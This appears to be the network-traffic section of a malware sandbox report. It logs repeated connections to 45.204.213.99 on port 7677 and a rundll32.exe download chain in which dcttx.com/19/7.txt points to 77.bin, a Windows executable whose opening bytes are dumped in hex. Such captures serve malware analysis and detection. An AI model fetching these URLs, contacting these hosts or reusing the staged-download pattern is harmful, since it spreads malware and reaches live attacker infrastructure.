Dec 22, 2024 09:29:11.017043114 CET | 49737 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:11.019392014 CET | 49736 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:11.020184994 CET | 7677 | 49737 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:11.020253897 CET | 7677 | 49737 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:11.020306110 CET | 49737 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:11.042536974 CET | 7677 | 49737 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:11.042658091 CET | 7677 | 49737 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:11.042701960 CET | 49737 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:11.043952942 CET | 7677 | 49737 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:11.044063091 CET | 7677 | 49737 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:11.044110060 CET | 49737 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:11.046685934 CET | 7677 | 49737 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:11.046797037 CET | 7677 | 49737 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:11.046835899 CET | 49737 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:11.049300909 CET | 7677 | 49737 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:11.097531080 CET | 49737 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:11.901422024 CET | 7677 | 49738 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:11.942143917 CET | 49738 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:12.005924940 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:12.074868917 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:12.126544952 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:12.126619101 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:12.195061922 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:12.195207119 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:12.943516016 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:13.063215017 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:13.063465118 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:13.989824057 CET | 49736 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:14.067928076 CET | 49737 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:14.943430901 CET | 49738 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:18.774816036 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:18.895129919 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:18.895204067 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:18.895236969 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:18.895265102 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:19.530600071 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:19.530838013 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:19.650410891 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:20.489411116 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:20.609211922 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:20.609255075 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:20.609291077 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:20.609318972 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:21.166152000 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:21.249398947 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:21.249629021 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:21.286552906 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:21.286582947 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:21.286639929 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:21.286668062 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:21.369237900 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:21.922535896 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:21.922981977 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:22.042615891 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:29.833781958 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:29.833784103 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:29.953421116 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:29.953526974 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:30.364742994 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:30.366378069 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:30.411995888 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:30.412002087 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:30.544481039 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:30.551487923 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:30.664057970 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:30.671077013 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:30.724625111 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:30.844454050 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:31.256556034 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:31.304543018 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:31.463490963 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:31.583149910 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:47.930079937 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:47.930130005 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:48.050035954 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:48.050072908 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:48.461496115 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:48.463073015 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:48.509010077 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:48.509042978 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:48.625688076 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:48.633096933 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:48.745398045 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:48.752712965 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:48.790544987 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:48.910399914 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:49.321837902 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:29:49.380451918 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:49.797136068 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:29:49.916990042 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:06.063807964 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:06.110193968 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:06.184361935 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:06.229789019 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:06.596607924 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:06.640861034 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:06.643614054 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:06.699872017 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:06.847846985 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:06.877763987 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:06.967350960 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:06.997838974 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:07.266596079 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:07.386197090 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:07.797791958 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:07.846184969 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:07.866573095 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:07.986135006 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:23.373635054 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:23.404849052 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:23.493479967 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:23.524677038 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:23.906037092 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:23.935837984 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:23.959129095 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:23.990360022 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:24.007057905 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:24.042670012 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:24.126645088 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:24.162314892 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:24.249010086 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:24.368846893 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:24.780489922 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:24.832555056 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:24.863259077 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:24.982774973 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:40.655158043 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:40.764569044 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:40.774772882 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:40.884121895 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:41.187731981 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:41.238261938 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:41.295217991 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:41.305105925 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:41.347630978 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:41.425107002 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:41.442307949 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:41.561835051 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:41.566483021 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:41.686115980 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:42.097865105 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:42.149470091 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:42.349984884 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:42.469623089 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:59.099174023 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:59.218640089 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:59.396166086 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:59.515661001 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:59.631720066 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:59.686748981 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:59.861727953 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:59.926510096 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:30:59.977554083 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:30:59.981270075 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:00.050121069 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:00.169543982 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:00.333858967 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:00.453358889 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:00.864976883 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:00.916374922 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:00.952557087 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:01.072144985 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:17.355031013 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:17.474539995 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:17.504853010 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:17.624353886 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:17.897620916 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:17.950242996 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:18.006402969 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:18.125984907 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:18.319916964 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:18.368045092 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:18.413450003 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:18.439620018 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:18.514720917 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:18.634251118 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:18.858803034 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:18.903727055 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:19.002255917 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:19.121787071 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:35.424213886 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:35.543725014 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:35.580521107 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:35.700005054 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:35.966181993 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:36.007374048 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:36.080126047 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:36.119379044 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:36.174563885 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:36.199695110 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:36.266881943 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:36.378093004 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:36.386442900 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:36.497525930 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:37.258836985 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:37.299954891 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:37.420332909 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:37.539927006 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:52.838906050 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:52.958441019 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:52.994940996 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:53.115113974 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:53.714457035 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:53.745491028 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:53.760890007 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:53.805946112 CET | 49740 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:53.865091085 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:53.865658998 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:53.917139053 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:53.925827980 CET | 7677 | 49740 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:54.014677048 CET | 49739 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:54.134185076 CET | 7677 | 49739 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:54.285800934 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
Dec 22, 2024 09:31:54.332468033 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:54.394356966 CET | 49741 | 7677 | 192.168.2.4 | 45.204.213.99
Dec 22, 2024 09:31:54.514004946 CET | 7677 | 49741 | 45.204.213.99 | 192.168.2.4
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Dec 22, 2024 09:28:59.828681946 CET | 49475 | 53 | 192.168.2.4 | 1.1.1.1
                            Dec 22, 2024 09:29:00.029417992 CET | 53 | 49475 | 1.1.1.1 | 192.168.2.4
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Dec 22, 2024 09:28:59.828681946 CET | 192.168.2.4 | 1.1.1.1 | 0x219 | Standard query (0) | dcttx.com | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Dec 22, 2024 09:29:00.029417992 CET | 1.1.1.1 | 192.168.2.4 | 0x219 | No error (0) | dcttx.com |  | 38.147.186.138 | A (IP address) | IN (0x0001) | false
                            • dcttx.com
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.4 | 49730 | 38.147.186.138 | 443 | 6204 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-12-22 08:29:02 UTC | 56 | OUT | GET /19/7.txt HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:02 UTC | 270 | IN | HTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:02 GMT
                            Content-Type: text/plain
                            Content-Length: 27
                            Last-Modified: Thu, 19 Dec 2024 15:28:55 GMT
                            Connection: close
                            ETag: "67643bb7-1b"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:02 UTC | 27 | IN | Data Raw: 68 74 74 70 73 3a 2f 2f 64 63 74 74 78 2e 63 6f 6d 2f 31 39 2f 37 37 2e 62 69 6e
                            Data Ascii: https://dcttx.com/19/77.bin


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.4 | 49731 | 38.147.186.138 | 443 | 6156 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-12-22 08:29:02 UTC | 56 | OUT | GET /19/7.txt HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:02 UTC | 270 | IN | HTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:02 GMT
                            Content-Type: text/plain
                            Content-Length: 27
                            Last-Modified: Thu, 19 Dec 2024 15:28:55 GMT
                            Connection: close
                            ETag: "67643bb7-1b"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:02 UTC | 27 | IN | Data Raw: 68 74 74 70 73 3a 2f 2f 64 63 74 74 78 2e 63 6f 6d 2f 31 39 2f 37 37 2e 62 69 6e
                            Data Ascii: https://dcttx.com/19/77.bin


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            2 | 192.168.2.4 | 49732 | 38.147.186.138 | 443 | 6204 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-12-22 08:29:04 UTC | 57 | OUT | GET /19/77.bin HTTP/1.1
                            accept: */*
                            host: dcttx.com
                            2024-12-22 08:29:05 UTC | 291 | IN | HTTP/1.1 200 OK
                            Server: nginx
                            Date: Sun, 22 Dec 2024 08:29:04 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 140288
                            Last-Modified: Thu, 19 Dec 2024 15:27:56 GMT
                            Connection: close
                            ETag: "67643b7c-22400"
                            Strict-Transport-Security: max-age=31536000
                            Accept-Ranges: bytes
                            2024-12-22 08:29:05 UTC16093INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 50 05 00 20 02 00 ff d0 c3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 0c 41 1d a6 6d 2f 4e a6 6d 2f 4e a6 6d 2f 4e c9 1b b1 4e b2 6d 2f 4e c9 1b 85 4e d0 6d 2f 4e c9 1b 84 4e 8a 6d 2f 4e af 15 bc 4e ad 6d 2f 4e a6 6d 2e 4e 29 6d 2f 4e c9 1b 80 4e ab 6d 2f 4e c9 1b b2 4e a7 6d 2f 4e 52 69 63 68 a6 6d 2f 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 12 b6 66 00 00 00 00 00 00 00 00 e0 00 02
                            Data Ascii: MZERXP @!L!This program cannot be run in DOS mode.$Am/Nm/Nm/NNm/NNm/NNm/NNm/Nm.N)m/NNm/NNm/NRichm/NPELtf
                            2024-12-22 08:29:05 UTC16384INData Raw: 08 89 4b 04 89 9e 80 01 00 00 ff 86 78 01 00 00 57 89 9e 7c 01 00 00 ff 15 24 50 41 00 b8 01 00 00 00 5f 5b 8b e5 5d c3 b9 01 00 00 00 53 8d be 98 00 00 00 89 4e 30 c7 46 34 03 00 00 00 89 46 38 89 4e 3c e8 5a d5 ff ff 85 c0 75 0d 8b 13 53 50 8b 02 50 ff 15 e4 50 41 00 5f 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f0 ff 15 4c 50 41 00 8b d8 8b 46 64 83 f8 03 0f 84 cf 00 00 00 8d be 5c 01 00 00 57 e8 0b ec ff ff 8b 4e 64 83 f9 01 74 0b 8b 56 64 85 d2 0f 85 aa 00 00 00 c7 46 64 02 00 00 00 c7 07 00 00 00 00 8b c3 e8 b4 01 00 00 8b 46 60 85 c0 74 20 83 7e 3c 00 74 13 8b 4e 40 6a 00 6a 10 68 40 74 41 00 51 ff 15 f4 51 41 00 c7 46 60 00 00 00 00 83 7e 30 00 74 22 8b 56 48 52 e8 7e ec ff ff 8b 46 04 83 c4 04 50 ff 15 38
                            Data Ascii: KxW|$PA_[]SN0F4F8N<ZuSPPPA_3[]SVWLPAFd\WNdtVdFdF`t ~<tN@jjh@tAQQAF`~0t"VHR~FP8
